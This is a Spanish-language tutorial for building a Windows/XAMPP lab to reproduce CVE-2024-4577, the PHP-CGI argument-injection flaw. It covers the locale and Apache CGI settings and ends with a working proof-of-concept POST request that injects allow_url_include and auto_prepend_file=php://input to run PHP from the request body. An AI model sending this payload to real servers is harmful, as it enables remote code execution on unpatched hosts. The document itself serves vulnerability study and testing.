
Crear laboratorio para CVE-2024-4577
| CVE | Descripción | CVSSv3 |
| CVE-2024-4577 | Vulnerabilidad de Inyección de Argumentos en PHP-CGI | 9.8 |
"CVE-2024-4577 es una vulnerabilidad crítica de inyección de argumentos en PHP que puede ser explotada para lograr ejecución remota de código (RCE). Según investigadores de DEVCORE, esta falla es el resultado de errores en las conversiones de codificación de caracteres, afectando la función 'Best Fit' en Windows." -
Descargue XAMPP (8.1.25 / PHP 8.1.25) Después de instalar XAMPP, verifique la versión de PHP. Debería ser 8.1.25. La versión de PHP se puede verificar ejecutando el comando "php -v" desde la línea de comandos. Si da error, se debe añadir a la variable de entorno PATH.
Es necesario cambiar la configuración regional. Para hacerlo, siga Panel de control > Reloj y Región > Región. Establezca el formato en Japonés, Chino Tradicional o Chino Simplificado. Haga clic en Administrativo > Cambiar configuración regional del sistema y seleccione la configuración regional correspondiente.
Si PHP no se ejecuta en modo CGI, debe realizar estos ajustes.
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"
AddType application/x-httpd-php .php
<Directory "C:/xampp/php">
Options +ExecCGI
AllowOverride None
Require all granted
</Directory>
LoadModule php_module "C:/xampp/php/php8apache2_4.dll". Ponga '#' al inicio de la línea.Guarde los cambios e inicie la instancia de Apache.
Si la salida del código PHP enviado en el cuerpo de la solicitud POST siguiente se ve en la respuesta, el paso de explotación es exitoso.
POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{HOST}}
User-Agent: curl/8.3.0
Accept: /
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
<?php
echo "vulnerable";
?>
Este entorno de laboratorio está destinado únicamente a fines educativos y no debe utilizarse en entornos en producción. No soy responsable de ningún daño o pérdida que pueda ocurrir como resultado de un uso inadecuado. Los usuarios deben utilizar este entorno bajo su propio riesgo.